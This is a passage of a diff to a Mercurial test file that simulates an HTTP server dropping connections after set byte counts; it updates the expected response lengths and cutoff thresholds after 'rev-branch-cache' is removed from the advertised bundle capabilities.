+ sendall(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(20 from 431) -> (0) batch branchmap bund (py36 !)
+ write(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(20 from 431) -> (0) batch branchmap bund (py3 no-py36 !)
write(36 from 36) -> (144) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
write(23 from 23) -> (121) Server: badhttpserver\r\n (no-py3 !)
write(37 from 37) -> (84) Date: $HTTP_DATE$\r\n (no-py3 !)
write(41 from 41) -> (43) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21 from 21) -> (22) Content-Length: 450\r\n (no-py3 !)
+ write(21 from 21) -> (22) Content-Length: 431\r\n (no-py3 !)
write(2 from 2) -> (20) \r\n (no-py3 !)
- write(20 from 450) -> (0) batch branchmap bund (no-py3 !)
+ write(20 from 431) -> (0) batch branchmap bund (no-py3 !)
write limit reached; closing socket
$LOCALIP - - [$ERRDATE$] Exception happened during processing request '/?cmd=capabilities': (glob)
Traceback (most recent call last):
@@ -341,7 +342,7 @@
Server sends incomplete headers for batch request
- $ hg serve --config badserver.closeaftersendbytes=728 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=709 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
TODO this output is horrible
@@ -363,17 +364,17 @@
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(*) -> (2) \r\n (glob)
- sendall(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
- write(36 from 36) -> (692) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
- write(23 from 23) -> (669) Server: badhttpserver\r\n (no-py3 !)
- write(37 from 37) -> (632) Date: $HTTP_DATE$\r\n (no-py3 !)
- write(41 from 41) -> (591) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21 from 21) -> (570) Content-Length: 450\r\n (no-py3 !)
- write(2 from 2) -> (568) \r\n (no-py3 !)
- write(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ sendall(160 from 160) -> (549) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ write(36 from 36) -> (673) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
+ write(23 from 23) -> (650) Server: badhttpserver\r\n (no-py3 !)
+ write(37 from 37) -> (613) Date: $HTTP_DATE$\r\n (no-py3 !)
+ write(41 from 41) -> (572) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
+ write(21 from 21) -> (551) Content-Length: 431\r\n (no-py3 !)
+ write(2 from 2) -> (549) \r\n (no-py3 !)
+ write(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
@@ -401,7 +402,7 @@
Server sends an incomplete HTTP response body to batch request
- $ hg serve --config badserver.closeaftersendbytes=793 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=774 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
TODO client spews a stack due to uncaught ValueError in batch.results()
@@ -422,17 +423,17 @@
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(*) -> (2) \r\n (glob)
- sendall(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
- write(36 from 36) -> (757) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
- write(23 from 23) -> (734) Server: badhttpserver\r\n (no-py3 !)
- write(37 from 37) -> (697) Date: $HTTP_DATE$\r\n (no-py3 !)
- write(41 from 41) -> (656) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21 from 21) -> (635) Content-Length: 450\r\n (no-py3 !)
- write(2 from 2) -> (633) \r\n (no-py3 !)
- write(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ sendall(160 from 160) -> (614) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ write(36 from 36) -> (738) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
+ write(23 from 23) -> (715) Server: badhttpserver\r\n (no-py3 !)
+ write(37 from 37) -> (678) Date: $HTTP_DATE$\r\n (no-py3 !)
+ write(41 from 41) -> (637) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
+ write(21 from 21) -> (616) Content-Length: 431\r\n (no-py3 !)
+ write(2 from 2) -> (614) \r\n (no-py3 !)
+ write(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
@@ -463,7 +464,7 @@
Server sends incomplete headers for getbundle response
- $ hg serve --config badserver.closeaftersendbytes=940 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=921 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
TODO this output is terrible
@@ -486,17 +487,17 @@
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(*) -> (2) \r\n (glob)
- sendall(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
- write(36 from 36) -> (904) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
- write(23 from 23) -> (881) Server: badhttpserver\r\n (no-py3 !)
- write(37 from 37) -> (844) Date: $HTTP_DATE$\r\n (no-py3 !)
- write(41 from 41) -> (803) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21 from 21) -> (782) Content-Length: 450\r\n (no-py3 !)
- write(2 from 2) -> (780) \r\n (no-py3 !)
- write(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ sendall(160 from 160) -> (761) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ write(36 from 36) -> (885) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
+ write(23 from 23) -> (862) Server: badhttpserver\r\n (no-py3 !)
+ write(37 from 37) -> (825) Date: $HTTP_DATE$\r\n (no-py3 !)
+ write(41 from 41) -> (784) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
+ write(21 from 21) -> (763) Content-Length: 431\r\n (no-py3 !)
+ write(2 from 2) -> (761) \r\n (no-py3 !)
+ write(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
@@ -520,7 +521,7 @@
readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
- readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob)
+ readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob)
readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob)
readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob)
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
@@ -544,7 +545,7 @@
Server stops before it sends transfer encoding
- $ hg serve --config badserver.closeaftersendbytes=973 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=954 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -573,7 +574,7 @@
Server sends empty HTTP body for getbundle
- $ hg serve --config badserver.closeaftersendbytes=978 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=959 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -591,17 +592,17 @@
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(*) -> (2) \r\n (glob)
- sendall(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
- write(36 from 36) -> (942) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
- write(23 from 23) -> (919) Server: badhttpserver\r\n (no-py3 !)
- write(37 from 37) -> (882) Date: $HTTP_DATE$\r\n (no-py3 !)
- write(41 from 41) -> (841) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21 from 21) -> (820) Content-Length: 450\r\n (no-py3 !)
- write(2 from 2) -> (818) \r\n (no-py3 !)
- write(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ sendall(160 from 160) -> (799) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ write(36 from 36) -> (923) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
+ write(23 from 23) -> (900) Server: badhttpserver\r\n (no-py3 !)
+ write(37 from 37) -> (863) Date: $HTTP_DATE$\r\n (no-py3 !)
+ write(41 from 41) -> (822) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
+ write(21 from 21) -> (801) Content-Length: 431\r\n (no-py3 !)
+ write(2 from 2) -> (799) \r\n (no-py3 !)
+ write(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
@@ -625,7 +626,7 @@
readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
- readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob)
+ readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob)
readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob)
readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob)
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
@@ -651,7 +652,7 @@
Server sends partial compression string
- $ hg serve --config badserver.closeaftersendbytes=1002 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=983 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -669,17 +670,17 @@
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(*) -> (2) \r\n (glob)
- sendall(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
- write(36 from 36) -> (966) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
- write(23 from 23) -> (943) Server: badhttpserver\r\n (no-py3 !)
- write(37 from 37) -> (906) Date: $HTTP_DATE$\r\n (no-py3 !)
- write(41 from 41) -> (865) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21 from 21) -> (844) Content-Length: 450\r\n (no-py3 !)
- write(2 from 2) -> (842) \r\n (no-py3 !)
- write(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ sendall(160 from 160) -> (823) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ write(36 from 36) -> (947) HTTP/1.1 200 Script output follows\r\n (no-py3 !)
+ write(23 from 23) -> (924) Server: badhttpserver\r\n (no-py3 !)
+ write(37 from 37) -> (887) Date: $HTTP_DATE$\r\n (no-py3 !)
+ write(41 from 41) -> (846) Content-Type: application/mercurial-0.1\r\n (no-py3 !)
+ write(21 from 21) -> (825) Content-Length: 431\r\n (no-py3 !)
+ write(2 from 2) -> (823) \r\n (no-py3 !)
+ write(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
@@ -702,7 +703,7 @@
readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n
readline(*) -> (27) Accept-Encoding: identity\r\n (glob)
readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
- readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob)
+ readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob)
readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob)
readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob)
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
@@ -733,7 +734,7 @@
Server sends partial bundle2 header magic
- $ hg serve --config badserver.closeaftersendbytes=999 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=980 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -778,7 +779,7 @@
Server sends incomplete bundle2 stream params length
- $ hg serve --config badserver.closeaftersendbytes=1008 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=989 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
